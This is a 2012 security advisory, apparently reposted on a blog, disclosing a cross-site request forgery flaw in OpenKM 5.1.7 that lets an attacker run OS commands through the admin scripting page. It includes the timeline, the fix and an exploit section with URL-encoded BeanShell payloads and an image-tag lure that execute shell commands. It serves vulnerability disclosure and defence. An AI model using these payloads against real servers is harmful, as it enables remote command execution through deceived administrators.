OpenKM 5.1.7 OS Command Execution (XSRF based)

########################################################################
#
# COMPASS SECURITY ADVISORY http://www.csnc.ch/
########################################################################
#
# ID:      COMPASS-2012-002
# Product: OpenKM Document Management System 5.1.7 [1]
# Vendor:  OpenKM
# Subject: Cross-site Request Forgery based OS Command Execution
# Risk:    High
# Effect:  Remotely exploitable
# Author:  Cyrill Brunschwiler (cyrill.brunschwiler@csnc.ch)
# Date:    January 3rd 2012
#
#########################################################################

Description:
------------
Cyrill Brunschwiler, Security Analyst at Compass Security Network Computing,
Switzerland discovered a web application issue based OS command execution flaw
in the OpenKM solution. OpenKM does allow administrative users (having the
AdminRole) to run bean shell scripts. Due to the flaw, an attacker could lure
an OpenKM administrator to a malicious web page that causes arbitrary OS
commands being run in the administrators OpenKM session context. This is
possible because OpenKM does not implement access control mechanisms to avoid
so called Cross-site Request Forgery [2] (a.k.a. CSRF, XSRF, session riding,
forceful browsing). The commands are being executed silently. In the end, this
allows an attacker to run OS commands with the privileges of the process owner
of the application server (JBOSS).

Vulnerable:
-----------
OpenKM 5.1.7 and most likely prior versions (unconfirmed)

Not vulnerable:
---------------
OpenKM version 5.1.8

Fix:
----
To avoid this issue the application must introduce Anti-XSRF tokens for the
web-based administrative interface. To avoid arbitrary command execution the
admin/scripting.jsp could be removed from the OpenKM.ear before the
application is being deployed. Note, the cron job functionality allows to run
*.jar and BeanShell scripts as well.

Exploit:
--------
Login as administrator (having the AdminRole) and call the URL in a different
browser window
http://example.com/OpenKM/admin/scripting.jsp?script=String%5B%5D+cmd+%3D+%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+%22%2Fbin%2Fecho+pwned+%3E+%2Ftmp%2Fpoc%22%7D%3BRuntime.getRuntime%28%29.exec%28cmd%29%3B

Alternatively the administrator could browse a prepared HTML page in a new tab



img = new Image();
img.src="http://example.com/OpenKM/admin/scripting.jsp?script=String%5B%5D+cmd+%3D+%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+%22%2Fbin%2Fecho+pwned+%3E+%2Ftmp%2Fpoc%22%7D%3B%0D%0ARuntime.getRuntime%28%29.exec%28cmd%29%3B"




The above exploit does nothing else than just creating a file in /tmp

String[] cmd = {"/bin/sh", "-c", "/bin/echo pwned > /tmp/poc"};
Runtime.getRuntime().exec(cmd);

Some might also want to browse directories
http://example.com/OpenKM/admin/scripting.jsp?script=import+java.io.*%3Btry+%7B++++String+ls_str%3B++++Process+ls_proc+%3D+Runtime.getRuntime%28%29.exec%28%22%2Fbin%2Fls+-lah%22%29%3B++++DataInputStream+ls_in+%3D+new+DataInputStream%28ls_proc.getInputStream%28%29%29%3B++++while+%28%28ls_str+%3D+ls_in.readLine%28%29%29+%21%3D+null%29+++++++++++++++++++print%28ls_str+%2B+%22%3Cbr%3E%22%29%3B%7D+catch+%28IOException+e%29+%7B%7D

import java.io.*;

try {
    String ls_str;
    Process ls_proc = Runtime.getRuntime().exec("/bin/ls -lah");
    DataInputStream ls_in = new DataInputStream(ls_proc.getInputStream());

    while ((ls_str = ls_in.readLine()) != null)
        print(ls_str + "
");

} catch (IOException e) {
}

Timeline:
---------
August 6th, Vulnerability discovered
August 9th, Vendor contacted
August 10th, Vendor notified
December 1st, Patched version released
January 2nd, Advisory released

References:
-----------
[1] OpenKM http://www.openkm.com
is an Free/Libre document management system that provides a web interface for
managing arbitrary files. OpenKM includes a content repository, Lucene
indexing, and jBPM workflow. The OpenKM system was developed using Java
technology.

[2] Cross-site Request Forgery https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
CSRF is an attack which forces an end user to execute unwanted actions on a
web application in which he/she is currently authenticated. With a little help
of social engineering (like sending a link via email/chat), an attacker may
force the users of a web application to execute actions of the attacker's
choosing. A successful CSRF exploit can compromise end user data and operation
in case of normal user. If the targeted end user is the administrator account,
this can compromise the entire web application.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s